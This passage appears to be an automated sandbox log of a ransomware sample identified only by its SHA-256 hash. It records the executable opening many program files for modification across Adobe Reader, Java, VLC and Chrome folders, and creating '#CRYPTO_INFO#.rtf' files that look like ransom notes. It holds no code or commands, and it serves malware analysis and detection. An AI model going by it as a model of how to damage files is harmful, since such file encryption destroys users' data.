(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\sat_logo_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_removeme-default_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_forward_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\manifest.json 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Review_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_sv_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-nodes.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_unselected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\javacpl.cpl 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\jfr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\extcheck.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaBrightDemiItalic.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluError_136x136.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_ie8.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\javascript_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\files_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\dblook 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\ij.bat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\tzdb.dat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\faf_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.exe.sig 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\javaws.policy 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jstat.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\adobe_spinner.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\splash.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\packager.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoInternetConnection_120x80.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\az_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\default.jfc 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\ui-strings.js 